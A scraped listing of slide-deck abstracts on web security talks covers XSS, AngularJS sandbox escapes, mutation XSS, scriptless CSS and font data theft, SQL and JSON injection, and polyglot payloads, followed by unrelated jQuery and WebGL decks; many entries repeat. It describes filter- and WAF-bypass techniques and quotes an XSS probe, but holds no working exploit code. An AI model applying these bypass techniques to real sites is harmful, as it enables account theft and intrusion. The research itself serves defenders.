ng-owasp: OWASP Top 10 for AngularJS Applications (Kevin Hakanson)
The OWASP Top 10 provides a list of the 10 most critical web application security risks. How do these relate to AngularJS applications? What security vulnerabilities should developers be aware of beyond XSS and CSRF?
This session will review the OWASP Top 10 with a front-end development focus on HTML and JavaScript. It will look at patterns to implement and others to consider avoiding. We will also explore several built-in features of AngularJS that help secure your application.
This document summarizes Mario Heiderich's presentation titled "Locking the Throne Room - How ES5+ will change XSS and Client Side Security" given at BlueHat, Redmond 2011. The presentation discusses how new features in ECMAScript 5 (ES5), such as Object.defineProperty(), can be used to prevent cross-site scripting (XSS) attacks by locking down access to sensitive DOM properties and methods on the client-side in a tamper-resistant way. This moves XSS mitigation closer to the client where the attacks occur, avoiding issues caused by impedance mismatches between server-side filters and client-side execution. The approach could allow role-based access control and intrusion
This document summarizes a talk given by Gareth Heyes and Mario Heiderich on web security and the PHPIDS project. It describes the early challenges of detecting attacks using simple blacklists and how the project evolved to address increasingly complex obfuscated payloads. Key points discussed include the introduction of a payload canonicalizer to normalize strings before detection, ongoing challenges of new browser behaviors and standards, and the importance of an open community approach to security research.
The document discusses the history and development of the Document Object Model (DOM) from its early implementations in 1995 to modern standards. It outlines key milestones like DOM Level 1 in 1998, the rise of JavaScript frameworks like Prototype, jQuery and MooTools in 2005-2006, and ongoing work by the W3C and WHATWG. The talk will explore security issues that can arise from the DOM's ability to convert strings to executable code and demonstrate an attack technique called DOM clobbering.
The document discusses security issues with AngularJS and summarizes four general attack vectors:
A1: Attacking the AngularJS sandbox by bypassing restrictions on dangerous objects and methods. Early versions had trivial bypasses but later versions required more creative techniques.
A2: Attacking the AngularJS sanitizer, which aims to sanitize HTML strings and remove XSS attacks. There were issues with both an older sanitizer version and the current version.
A3: Attacking the Content Security Policy (CSP) mode in AngularJS.
A4: Attacking vulnerabilities directly in the AngularJS codebase through techniques like sandbox bypasses.
Scriptless Attacks - Stealing the Pie without touching the Sill (Mario Heiderich)
- The document discusses scriptless attacks that can bypass traditional XSS defenses like NoScript and XSS filters by leveraging new HTML5 and CSS features.
- It presents several proof-of-concept attacks including using CSS to steal passwords, using SVG fonts to brute force CSRF tokens, and using custom fonts to leak sensitive information like passwords without using JavaScript.
- The attacks demonstrate that even without scripting, features in HTML5 and CSS can be abused to conduct traditional XSS attacks and undermine security defenses, so more work is needed to protect against side-channels and unwanted data leakage from the browser.
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-... (Mario Heiderich)
The clipboard is one of the most commonly used tools across operating systems, window managers and devices. Pressing Ctrl-C and Ctrl-V has become so fundamentally important to productivity and usability that we cannot get rid of it anymore. We happily and often thoughtlessly copy things from one source and paste them into another. URLs into address-bars, lengthy commands into console windows, text segments into web editors and mail interfaces. And we never worry about security when doing so. Because what could possibly go wrong, right?
But have we ever asked ourselves what the clipboard content actually consists of? Do we really know what it contains? And are we aware of the consequences a thoughtless copy&paste interaction can have? Who else can control the contents of the clipboard? Is it really just us doing Ctrl-C, or are there other forces in the realm who are able to infect what we believe to be clean, who can desecrate what we trust so blindly that we never question or observe it?
This talk is about the clipboard and the technical details behind it. How it works, what it really contains – and who can influence its complex range of contents. We will learn about a new breed of targeted attacks, including cross-application XSS from PDF, ODT, DOC and XPS that allow stealing website accounts faster than you can click, turn your Excel sheet into a monster, and learn about ways to smuggle creepy payloads that stay hidden from sight until they execute. Oh, and we’ll also see what can be done about that and what defensive measures we have managed to create so far.
Dev and Blind - Attacking the weakest Link in IT Security (Mario Heiderich)
The developer is an easy and valuable target for malicious minds. The reasons for that are numerous and hard to come by. This talk delivers examples, proof, discussion and awkward moments in a pretty special way.
Everybody hates developers – especially web developers. And why not? The cracks and crevices of their APIs and implementations are the reason that vulnerabilities in web applications are still a widespread issue – and will continue to be in the foreseeable future.
Bashing and blaming them for their wrongdoings is fun – boy, they are stupid in their mistakes! But has anyone ever dared to have an open on-stage battle with an actual developer?
And which of the developers dares to face their collective nemesis – the attacker? Can there be life where matter and anti-matter collide? We will know about this soon – because this is what this talk is going to be about. Developer versus attacker – vulnerability versus defense. Be prepared for swearing, violence and people leaving the stage prematurely in tears.
This document provides an overview of HTML5 including its history, current status, implementation in browsers, and both benefits and security issues. It discusses how HTML5 aims to simplify and enhance usability but also introduces new vulnerabilities because its dynamic nature forces rapid implementation. While HTML5 enables rich content and interactivity, its inconsistencies and evolving specifications, combined with a rush for browser support, have resulted in buggy websites and the potential for attacks like hijacking forms, stealing data, and bypassing security restrictions.
This document discusses current and emerging web attacks. It notes that while cross-site scripting (XSS) and SQL injection attacks were once prevalent, modern web applications and browsers incorporate defenses against these attacks. However, the document argues that web applications and browsers are evolving in ways that enable new types of multi-layer attacks. Examples are provided of attacks that combine layers like the database management system, JavaScript execution in browsers, and HTML parsing quirks to bypass defenses. The document urges security researchers and practitioners to consider these evolving attack techniques and the growing diversity of client devices and applications.
Polyglot payloads in practice by avlidienbrunn at HackPra (Mathias Karlsson)
A lecture/talk describing how to build and use polyglot payloads for finding vulnerabilities in web applications that traditional payloads can't.
Here's the last slide: http://www.slideshare.net/MathiasKarlsson2/final-slide-36636479
The Image that called me - Active Content Injection with SVG Files (Mario Heiderich)
Mario Heiderich gave a presentation on active content injection using SVG files. He discussed how SVG files are XML-based and support scripting, allowing execution of JavaScript. This enables security issues like XSS. Browser implementations of SVG are inconsistent, with different levels of script support depending on how SVG files are deployed (inline, via <img>, etc). The exploits discussed included SVG vulnerabilities in Firefox, Opera, and Chromium. Defense is difficult due to a lack of documentation and filters, and new vectors are found weekly. Proposed future work included an SVG purifier and raising awareness of the issues.
New Methods in Automated XSS Detection & Dynamic Exploit Creation (Ken Belva)
This slide deck consists of three presentations showing both an overall and detailed view of the new patent pending methods to make Cross-Site Scripting (XSS) detection more accurate and faster as well as the creation of dynamic exploits. It was presented at OWASP AppSecUSA 2015. All Material and Methods Patent Pending Globally. All Rights Reserved.
Please visit: http://xssWarrior.com
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ... (Mario Heiderich)
This document discusses using ES5 capabilities to help mitigate cross-site scripting (XSS) vulnerabilities. It summarizes the history of JavaScript and XSS, current approaches to mitigation, and limitations. It then proposes using ES5 features like Object.defineProperty to prohibit unauthorized access to DOM properties and add monitoring of property access. This could enable intrusion detection and role-based access control without impedance mismatches. Examples show freezing DOM objects to prevent tampering. Limitations include blacklisting and compatibility issues, but the approach aims to detect and prevent XSS at the client level without server-side filtering.
Mario Heiderich presents on generic attack detection using PHPIDS. PHPIDS uses 70 regex rules to detect attacks like XSS and SQLi by analyzing user input. It first normalizes the input, then detects patterns through a conversion and detection process, and can log or report any findings. PHPIDS aims to avoid blacklisting traps through this generic approach. Future work may include optimizing existing detection routines and adding more granular analysis techniques.
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built, along with more complex payloads to evade filters and WAFs. In these slides, techniques to bypass them are described, from HTML to JavaScript. See also http://brutelogic.com.br/blog
This document discusses DOM based cross-site scripting (XSS) and methods for detecting it. It begins by explaining what DOM and XSS are, and defines DOM based XSS as exploiting client-side script execution by modifying the DOM environment. Next, it provides examples of how DOM based XSS can work by manipulating DOM objects like document.location. The document concludes by outlining approaches for detecting DOM based XSS including general analysis, using the headless browser PhantomJS to programmatically interact with web pages, and leveraging a modified version of PhantomJS called Tainted PhantomJS that is designed specifically for DOM based XSS detection.
I thought you were my friend - Malicious Markup (Mario Heiderich)
The document is a transcript from a talk given by Mario Heiderich at the CONFidence 2009 conference. It discusses various ways that malicious code can be embedded in markup and exploited by browsers, including through techniques like inline SVG, XML namespaces, XUL artifacts, and more. It provides examples of actual malicious code and encourages awareness of legacy browser vulnerabilities as new web standards are developed.
This document discusses cross-site scripting (XSS) attacks and defenses. It describes different types of XSS (persistent, non-persistent, DOM-based), how XSS attacks work, and examples of XSS injection vectors. It also provides recommendations for preventing XSS, including encoding output, sanitizing input, and using features like HttpOnly cookies.
When Ajax Attacks! Web application security fundamentals (Simon Willison)
The document is a presentation about web application security fundamentals and attacks. It discusses topics like cross-site scripting (XSS), cross-site request forgery (CSRF), UTF-7 encoding, and other techniques like JSON parsing (JSONP). In the past, security tutorials focused on not trusting user input, avoiding SQL injection, and preventing JavaScript injection, but the presenter aims to discuss more modern attacks.
So you thought you were safe using AngularJS.. Think again! (Lewis Ardern)
The document is a presentation on AngularJS security given by Lewis Ardern. It includes:
- An introduction and biography of the presenter
- An agenda covering AngularJS security protections, issues, third-party libraries, and the future
- A quiz on AngularJS fundamentals
- Explanations of AngularJS security protections like output encoding, SCE, and CSRF protection
- Discussions of potential security issues like template loading, expression injection, and sandbox escapes
- Recommendations for securely implementing AngularJS templates and expressions
This talk introduces and discusses a novel, mostly unpublished technique to successfully attack websites that are protected by state-of-the-art XSS protection. This attack, labeled Mutation-XSS (mXSS), is capable of bypassing high-end filter systems by utilizing the browser and its unknown capabilities - every single f***** one of them. We analyzed the type and number of high-profile websites and applications that are affected by this kind of attack. Several live demos during the presentation will share these impressions and help in understanding what mXSS is, why mXSS is possible and why it is important for defenders as well as professional attackers to understand and examine mXSS even further. The talk wraps up several years of research in this field, shows the abhorrent findings, discusses the consequences and delivers a step-by-step guide on how to protect against this kind of mayhem - with a strong focus on feasibility and scalability.
JSON SQL Injection and the Lessons Learned (Kazuho Oku)
This document discusses JSON SQL injection and lessons learned from vulnerabilities in SQL query builders. It describes how user-supplied JSON input containing operators instead of scalar values could manipulate queries by injecting conditions like id!='-1' instead of a specific id value. This allows accessing unintended data. The document examines how SQL::QueryMaker and a strict mode in SQL::Maker address this by restricting query parameters to special operator objects or raising errors on non-scalar values. While helpful, strict mode may break existing code, requiring changes to parameter handling. The vulnerability also applies to other languages' frameworks that similarly convert arrays to SQL IN clauses.
DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. Certain vulnerabilities in JavaScript code cannot be tracked by standard IDS or perimeter security measures, which leads to a huge potential vulnerability; the code can be abused to steal data or bypass authentication mechanisms in web interfaces. This presentation will demonstrate vulnerabilities and also present Minded Security’s latest countermeasure, DOMinatorPro.
OWASP London - So you thought you were safe using AngularJS.. Think again! (Lewis Ardern)
OWASP London talk on AngularJS Security, video here: https://www.youtube.com/watch?v=DcpD5Wh4uOQ&feature=youtu.be&t=4244
Similar talk presented at FluentConf San Jose - https://www.slideshare.net/LewisArdern/so-you-thought-you-were-safe-using-angularjs-think-again
Lightning talk I gave at SEC-T spring pub 2016, talking about how to use the "ON DUPLICATE KEY UPDATE" syntax to not only extract but also modify/add information in the database.
The example I brought up was a site that had an SQL Injection in the register page, which could be used to change the admin password without having to crack it.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016 (Frans Rosén)
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He has received the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present, using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call at 02:30 on a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
The developer is an easy and valuable target for malicious minds. The reasons for that are numerous and hard to come by. This talk delivers examples, proof, discussion and awkward moments in a pretty special way.
Everybody hates developers – especially web developers. And why not? The cracks and crevices of their APIs and implementations are the reason that vulnerabilities in web applications are still a widespread issue – and will continue to be in the foreseeable future.
Bashing and blaming them for their wrongdoings is fun – boy, they are stupid in their mistakes! But has anyone ever dared to have an open on stage battle with an actual developer?
And who of the developers dares to face their collective nemesis – the attacker? Can there be life where matter and anti-matter collide? We will know about this soon – because this is what this talk is going to be about. Developer versus attacker – vulnerability versus defense. Be prepared for swearing, violence and people leaving the stage prematurely in tears.
This document provides an overview of HTML5 including its history, current status, implementation in browsers, and both benefits and security issues. It discusses how HTML5 aims to simplify and enhance usability but also introduces new vulnerabilities due to its dynamic nature forcing rapid implementation. While HTML5 enables rich content and interactivity, its inconsistencies and evolving specifications combined with a rush for browser support has resulted in buggy websites and potential for attacks like hijacking forms, stealing data, and bypassing security restrictions.
This document discusses current and emerging web attacks. It notes that while cross-site scripting (XSS) and SQL injection attacks were once prevalent, modern web applications and browsers incorporate defenses against these attacks. However, the document argues that web applications and browsers are evolving in ways that enable new types of multi-layer attacks. Examples are provided of attacks that combine layers like the database management system, JavaScript execution in browsers, and HTML parsing quirks to bypass defenses. The document urges security researchers and practitioners to consider these evolving attack techniques and the growing diversity of client devices and applications.
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
A lecture/talk describing how to build and use polyglot payloads for finding vulnerabilities in web applications that traditional payloads can't.
Here's the last slide: http://www.slideshare.net/MathiasKarlsson2/final-slide-36636479
The Image that called me - Active Content Injection with SVG FilesMario Heiderich
Mario Heiderich gave a presentation on active content injection using SVG files. He discussed how SVG files are XML-based and support scripting, allowing execution of JavaScript. This enables security issues like XSS. Browser implementations of SVG are inconsistent, with different levels of script support depending on how SVG files are deployed (inline, via <img>, etc). Exploits discussed SVG vulnerabilities in Firefox, Opera, and Chromium. Defense is difficult due to lack of documentation and filters, and new vectors are found weekly. Future work proposed a SVG purifier and raising awareness of issues.
New Methods in Automated XSS Detection & Dynamic Exploit CreationKen Belva
This slide deck consists of three presentations showing both an overall and detailed view of the new patent pending methods to make Cross-Site Scripting (XSS) detection more accurate and faster as well as the creation of dynamic exploits. It was presented at OWASP AppSecUSA 2015. All Material and Methods Patent Pending Globally. All Rights Reserved.
Please visit: http://xssWarrior.com
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Mario Heiderich
This document discusses using ES5 capabilities to help mitigate cross-site scripting (XSS) vulnerabilities. It summarizes the history of JavaScript and XSS, current approaches to mitigation, and limitations. It then proposes using ES5 features like Object.defineProperty to prohibit unauthorized access to DOM properties and add monitoring of property access. This could enable intrusion detection and role-based access control without impedance mismatches. Examples show freezing DOM objects to prevent tampering. Limitations include blacklisting and compatibility issues, but the approach aims to detect and prevent XSS at the client level without server-side filtering.
Mario Heiderich presents on generic attack detection using PHPIDS. PHPIDS uses 70 regex rules to detect attacks like XSS and SQLi by analyzing user input. It first normalizes the input, then detects patterns through a conversion and detection process, and can log or report any findings. PHPIDS aims to avoid blacklisting traps through this generic approach. Future work may include optimizing existing detection routines and adding more granular analysis techniques.
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
This document discusses DOM based cross-site scripting (XSS) and methods for detecting it. It begins by explaining what DOM and XSS are, and defines DOM based XSS as exploiting client-side script execution by modifying the DOM environment. Next, it provides examples of how DOM based XSS can work by manipulating DOM objects like document.location. The document concludes by outlining approaches for detecting DOM based XSS including general analysis, using the headless browser PhantomJS to programmatically interact with web pages, and leveraging a modified version of PhantomJS called Tainted PhantomJS that is designed specifically for DOM based XSS detection.
I thought you were my friend - Malicious MarkupMario Heiderich
The document is a transcript from a talk given by Mario Heiderich at the CONFidence 2009 conference. It discusses various ways that malicious code can be embedded in markup and exploited by browsers, including through techniques like inline SVG, XML namespaces, XUL artifacts, and more. It provides examples of actual malicious code and encourages awareness of legacy browser vulnerabilities as new web standards are developed.
This document discusses cross-site scripting (XSS) attacks and defenses. It describes different types of XSS (persistent, non-persistent, DOM-based), how XSS attacks work, and examples of XSS injection vectors. It also provides recommendations for preventing XSS, including encoding output, sanitizing input, and using features like HttpOnly cookies.
When Ajax Attacks! Web application security fundamentalsSimon Willison
The document is a presentation about web application security fundamentals and attacks. It discusses topics like cross-site scripting (XSS), cross-site request forgery (CSRF), UTF-7 encoding, and other techniques like JSON parsing (JSONP). In the past, security tutorials focused on not trusting user input, avoiding SQL injection, and preventing JavaScript injection, but the presenter aims to discuss more modern attacks.
So you thought you were safe using AngularJS.. Think again!Lewis Ardern
The document is a presentation on AngularJS security given by Lewis Ardern. It includes:
- An introduction and biography of the presenter
- An agenda covering AngularJS security protections, issues, third-party libraries, and the future
- A quiz on AngularJS fundamentals
- Explanations of AngularJS security protections like output encoding, SCE, and CSRF protection
- Discussions of potential security issues like template loading, expression injection, and sandbox escapes
- Recommendations for securely implementing AngularJS templates and expressions
This talk introduces and discusses a novel, mostly unpublished technique to successfully attack websites that are applied with state-of-the-art XSS protection. This attack labeled Mutation-XSS (mXSS) is capable of bypassing high-end filter systems by utilizing the browser and its unknown capabilities - every single f***** one of them. We analyzed the type and number of high-profile websites and applications that are affected by this kind of attack. Several live demos during the presentation will share these impressions and help understanding, what mXSS is, why mXSS is possible and why it is of importance for defenders as well as professional attackers to understand and examine mXSS even further. The talk wraps up several years of research on this field, shows the abhorrent findings, discusses the consequences and delivers a step-by-step guide on how to protect against this kind of mayhem - with a strong focus on feasibility and scalability.
JSON SQL Injection and the Lessons LearnedKazuho Oku
This document discusses JSON SQL injection and lessons learned from vulnerabilities in SQL query builders. It describes how user-supplied JSON input containing operators instead of scalar values could manipulate queries by injecting conditions like id!='-1' instead of a specific id value. This allows accessing unintended data. The document examines how SQL::QueryMaker and a strict mode in SQL::Maker address this by restricting query parameters to special operator objects or raising errors on non-scalar values. While helpful, strict mode may break existing code, requiring changes to parameter handling. The vulnerability also applies to other languages' frameworks that similarly convert arrays to SQL IN clauses.
DOM Based XSS (or as it is called in some texts, “type-0 XSS”) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. Certain vulnerabilities in JavaScript code cannot be tracked by standard IDS or perimeter security measures, which creates a huge potential for vulnerability: the code can be abused to steal data or bypass authentication mechanisms in web interfaces. This presentation will demonstrate vulnerabilities and also present Minded Security’s latest countermeasure, DOMinatorPro.
OWASP London - So you thought you were safe using AngularJS.. Think again! - Lewis Ardern
OWASP London talk on AngularJS Security, video here: https://www.youtube.com/watch?v=DcpD5Wh4uOQ&feature=youtu.be&t=4244
Similar talk presented at FluentConf San Jose - https://www.slideshare.net/LewisArdern/so-you-thought-you-were-safe-using-angularjs-think-again
Lightning talk I gave at SEC-T spring pub 2016, talking about how to use the "ON DUPLICATE KEY UPDATE" syntax to not only extract but also modify/add information in the database.
The example I brought up was a site that had an SQL Injection in the register page, which could be used to change the admin password without having to crack it.
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016 - Frans Rosén
Frans Rosén has reported hundreds of security issues using his big white hat since 2012. He has received the biggest bounty ever paid on HackerOne, and is one of the highest ranked bug bounty researchers of all time. He's been bug bounty hunting with an iPhone in Thailand, in a penthouse suite in Las Vegas and without even being present, using automation. He'll share his stories about how to act when a company's CISO is screaming "SH******T F*CK" in a phone call at 02:30 on a Friday night, what to do when companies are sending him money without any reason and why Doctors without Borders are trying to hunt him down.
This document discusses cross-origin attacks using polyglot files that can be interpreted in multiple formats. Specifically, it examines:
1) Syntax injection attacks where fragments of PDF syntax are injected into HTML pages hosted on vulnerable sites, allowing extraction of sensitive data from the original domain.
2) Content smuggling attacks where an attacker uploads a polyglot file in a benign format (e.g. PDF) that also contains malicious content to a vulnerable site, then embeds it to exploit visitors through content reinterpretation.
3) The potential for these attacks using PDF, which has powerful interactive capabilities, error-tolerant parsing, and the ability to issue cross-origin requests, such as CSRF with cookies.
This document discusses bug bounty programs, which pay security researchers monetary rewards for reporting qualifying security bugs to companies. It explains that bug bounties are a cost-effective way for companies to improve security. The document provides tips for getting started in bug hunting, such as practicing skills, reading materials, and thinking logically. Popular bug bounty programs and platforms are also listed.
If You Can't Beat 'Em, Join 'Em (AppSecUSA) - bugcrowd
Grant McCracken and Daniel Trauner's presentation on setting up and managing a successful bug bounty program. Having a bug bounty program is one of the most efficient methods of finding security vulnerabilities today. But, as anyone who has tried to run a bug bounty program knows, it's not a trivial undertaking... As professionals who have helped to manage hundreds of bug bounty programs, we're uniquely positioned to provide advice on how to succeed. Whether you're already running a bug bounty program, are looking to run a bug bounty program, or are a researcher, this talk aims to deepen your knowledge of the subject.
Writing vuln reports that maximize payouts - Nullcon 2016 - bugcrowd
Writing Vuln Submissions that Maximize Your Payouts - presentation given at Nullcon 2016 by Bugcrowd's Kymberlee Price.
Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd
The Game of Bug Bounty Hunting - Money, Drama, Action and Fame - Abhinav Mishra
The document provides an overview of the game of bug bounty hunting, including a brief history of bug bounty programs, the present state of platforms like HackerOne and BugCrowd, tips for getting started, techniques for finding different types of vulnerabilities, examples of famous bounty submissions, and potential drama one may face. It also includes suggestions for resources, tools, blogs, and people to follow to continue learning and developing skills in bug bounty hunting.
This document provides an overview of bug bounty hunting. It discusses:
- What bug bounty programs are and how they work
- A brief history of major bug bounty programs from the 1990s to present day
- Reasons to participate in bug bounty hunting like money, career opportunities, and enjoyment
- Popular bug bounty platforms and programs
- How to get started with the process of bug hunting
- Tips for writing bug reports that document the issue and steps to reproduce it
- Examples of past bug bounty finds, like an SVG XSS filter bypass and a tapjacking proof of concept
Bug bounty programs involve paying security researchers rewards for finding vulnerabilities in companies' products. To participate, researchers need to understand the target company's products and domains, know which companies offer bounties, and find bugs that are in scope like XSS, SQL injection, or authentication bypasses. Rewards can range from $100 to $20,000. Major companies like Google, Facebook, and Mozilla run bounty programs and have collectively paid over $1 million to researchers. Examples are shown of real bugs found and reported through bounty programs. The conclusion encourages reporting bugs to companies rather than selling vulnerabilities.
The document provides an introduction to bug bounty programs for beginners. It outlines some prerequisites like patience and basic security knowledge. It highlights rewards available in bug bounty programs like money and gifts. The document recommends initial approaches like understanding the testing scope and performing reconnaissance on domains and subdomains. It also provides tips on tools for testing like web proxies and Firefox addons. Automated testing on a local web server is discussed along with techniques for bug submission and reporting. A demo of a stored XSS bug in Facebook is presented at the end.
This document provides an introduction to bug bounty programs. It defines what a bug bounty program is, provides a brief history of major programs, and discusses reasons they are beneficial for both security researchers and companies. Key points covered include popular programs like Google and Facebook, tools used in bug hunting like Burp Suite, and lessons for researchers such as writing quality reports and following each program's rules.
This is a bug bounty hunter presentation given at Nullcon 2016 by Bugcrowd's Faraz Khan.
Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd
The most massive crime of identity theft in history was perpetrated in 2007 by exploiting an SQL Injection vulnerability. This issue is one of the most common and most serious threats to web application security. In this presentation, you'll see some common myths busted and you'll get a better understanding of defending against SQL injection.
As presented at this year's RSA Conference, a 2016 survey of critical infrastructure companies and officials demonstrates that this scenario could be reality. Jay and Julia will take you through the spine-chilling specifics of why the nation's critical infrastructure is at an ever-increasing risk of cyber attacks as hackers make it their prime target.
[DefCon 2016] I got 99 Problems, but Little Snitch ain’t one! - Synack
Security products should make our computers more secure, not less. Little Snitch is the de facto personal firewall for OS X that aims to secure a Mac by blocking unauthorized network traffic. Unfortunately bypassing this firewall's network monitoring mechanisms is trivial...and worse yet, the firewall's kernel core was found to contain an exploitable ring-0 heap-overflow. #fail
The document discusses several tools for testing iOS applications, including ChaoticMarch, Machshark, and Objc_trace. ChaoticMarch is described as a tool for simulating user interactions and automating testing of an iOS app. It allows writing Lua scripts to interact with the UI and regulate test execution speed. Machshark is a tool for analyzing Mach IPC messages and Objc_trace allows tracing Objective-C method calls. The document also provides examples of Lua scripts for ChaoticMarch that find and interact with UI elements to automate tasks like filling fields and logging in.
How to steal and modify data using Business Logic flaws - Insecure Direct Obj... - Frans Rosén
This document discusses insecure direct object references (IDOR), which occur when a developer exposes references like file or database keys without access control. This allows attackers to access unauthorized data by manipulating the references. The document provides examples of IDOR vulnerabilities found in Twitter, Oculus, Square, Zapier, and WordPress. It emphasizes having a generic access control model, using user IDs instead of numeric IDs, and thoroughly reviewing code to prevent IDOR issues.
Time based CAPTCHA protected SQL injection through SOAP-webservice - Frans Rosén
Frans Rosén of detectify discusses SQL injection techniques through a SOAP webservice. He provides steps to create a proof of concept attack with as few requests as possible to find vulnerable storefronts. Examples are given of time-based SQL injection payloads using substring, ascii, and sleep functions to retrieve the username and potentially other information about the target host. A link is also provided to a paper on SQL injection optimization and obfuscation techniques.
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015 - CODE BLUE
Some voices claim that "Angular is what HTML would have been if it had been designed for building web applications". While this statement may or may not be true, it certainly counts as one of the bolder ones a JavaScript web framework can ever issue. And where boldness is glistening like a German Bratwurst sausage in the evening sun, a critical review from a grumpy old security person shouldn’t be too far away. This talk will have a stern, very stern look at AngularJS in particular and shed light on the security aspects of this ever-popular tool. Did the super-hero framework do everything right and follow its own super-heroic principles? Does AngularJS increase or rather decrease the attack surface of a web application? How does AngularJS play along with the Content Security Policy, and was it a good idea to combine this kind of security with futuristic feature creep? And what about AngularJS version 2.0? Beware that we won’t stop at glancing at the code itself, investigating security best practices, and verifying compatibility and other common things that contribute to robust security (or lack thereof). We will cross the moral border and see if the AngularJS team could notice rogue bug tickets. A pivotal question that everyone is wondering about is: Have they successfully kept evil minds like yours truly, the speaker here, from introducing new security bugs into the code base? This talk is a reckoning with a modern JavaScript framework that promises a lot and keeps even more, not necessarily for the best for developers and users. We will conclude by deriving a general lesson learnt and hopefully agree that progress doesn't invariably mean an enhancement.
Appsec usa2013 js_libinsecurity_stefanodipaola - drewz lin
This document summarizes Stefano di Paola's talk on security issues with JavaScript libraries. It discusses how jQuery's $() method can be considered a "sink" that executes HTML passed to it, including examples of XSS via jQuery selectors and AJAX calls. It also covers problems with JSON parsing regular expressions, AngularJS expression injection, and credentials exposed in URLs. Solutions proposed include validating all input, auditing third-party libraries, and moving away from approaches like eval() that execute untrusted code.
HTML5DevConf 2013 (October): WebGL is a game changer! - Iker Jamardo
WebGL is getting everywhere. The recent announcement from Microsoft that Internet Explorer is finally supporting WebGL is just another example of the importance that this technology is gaining among web technologies. For the first time, web developers can access complex graphics features that were only available for native game development. But what are the real advantages of WebGL over other web based game development technologies? What are the different game engines that support it? Is WebGL ready for cross-platform game development? Can only 3D games benefit from WebGL? All these questions and more will be answered in this talk full of code snippets and useful tips that will try to show that the web environment (and especially WebGL) can be great for developing successful games, and could become a real game changer.
This document provides an overview of JavaScript basics. It discusses how websites have evolved from static pages using frames to highly interactive single page applications thanks to JavaScript. JavaScript runs in the browser and allows for interactivity through manipulating the DOM, doing calculations, fetching data, and more. The document explains how to embed JavaScript using <script> tags and control execution timing. It also covers fundamental concepts like objects, properties, methods, events, and event handlers. Code demos are provided to demonstrate "Hello World", events, scope, and using AJAX with events.
The document provides an introduction to developing complex front-end applications using HTML and JavaScript. It discusses how JavaScript modules can be organized in a way that is similar to frameworks like WPF and Silverlight using simple constructs like the module pattern. It also covers asynchronous module definition (AMD) and how modules can be loaded and dependencies managed using RequireJS. The document demonstrates unit testing jQuery code and using pubsub for loose coupling between modules. Finally, it discusses how CSS compilers like SASS can make CSS authoring more productive by allowing variables, nesting and mixins.
Node.js is a JavaScript runtime built on Chrome's V8 engine that makes building network and server-side applications quick and easy. It is commonly used with AngularJS (Angular) for the front-end to create full-stack JavaScript (MEAN stack) applications. Node.js uses an event-driven, non-blocking I/O model that makes it lightweight and efficient. Common uses of Node.js include building real-time applications, working with files and streams, and using modules to reuse and share code. MongoDB is often used as the database for MEAN stack applications and Mongoose provides an ORM for interacting with MongoDB from Node.js applications. Angular is a front-end web application framework that
This document discusses 3D graphics techniques using CSS3, jQuery, CSS shaders, and WebGL. It provides demonstrations of 3D effects created with only CSS3 and jQuery mobile code. CSS shaders and WebGL allow more complex 3D graphics by using vertex and fragment shaders. Toolkits like Three.js and tQuery.js simplify working with WebGL. The document recommends books and meetups for learning more about these technologies.
This document provides an introduction to jQuery, covering its features, comparisons to other frameworks, selectors, and plugins. jQuery is an open-source JavaScript library that simplifies DOM manipulation, event handling, animations, and Ajax interactions. It uses CSS-style selectors to select and manipulate HTML elements. Some key features include DOM element selections, DOM traversal/modification, DOM manipulation based on CSS selectors, events, effects/animations, Ajax, and extensibility through plugins. The document also discusses jQuery versus other frameworks like Dojo and YUI, demonstrates basic selectors and methods, and encourages the use of plugins to add additional functionality.
Yeoman AngularJS and D3 - A solid stack for web apps - climboid
This was a course given in Bangalore, India for JSChannel conf 2013. It encompasses the use of AngularJS and D3 in a harmonious way and gives an overview of each of the frameworks / libraries.
JSMVCOMFG - To sternly look at JavaScript MVC and Templating Frameworks - Mario Heiderich
The document discusses JavaScript MVC and templating frameworks and security issues found during penetration testing. Several frameworks were found to execute arbitrary JavaScript from markup in dangerous ways due to overuse of eval-like functions and lack of separation between code and content. This could lead to bypassing of content security policies. Metrics are proposed to evaluate frameworks on security practices like sandboxing and preventing injection into templates. While challenges exist, following best practices like strict separation of code and content could help frameworks improve security.
The document discusses frameworkless web development in Clojure using libraries like Ring, Clout, Compojure, Hiccup, Enlive, and Friend. Ring provides HTTP abstraction, Clout and Compojure handle routing, Hiccup and Enlive are used for HTML templating, and Friend handles authentication. These libraries can be composed to build web applications without a large framework by leveraging Clojure's data structures and functions.
This document introduces jQuery, including its environment, implementation, and use with jQuery UI. jQuery is a JavaScript library that simplifies client-side scripting by providing methods for selecting elements, handling events, performing animations and AJAX requests, and manipulating the DOM. The document provides examples of using jQuery for these tasks and binding jQuery UI widgets like tabs.
SPTechCon - Share point and jquery essentials - Mark Rackley
This document provides an outline for a workshop on using jQuery and SharePoint. The workshop will cover jQuery overview and common methods, deployment and development tools and techniques, interacting with SharePoint and the DOM, reading and writing SharePoint list data, using third party jQuery libraries, and building a sample application. Key topics include jQuery vs JavaScript, common jQuery methods, debugging tools, retrieving and updating SharePoint fields, SPServices vs client object model, and recommendations for third party jQuery libraries.
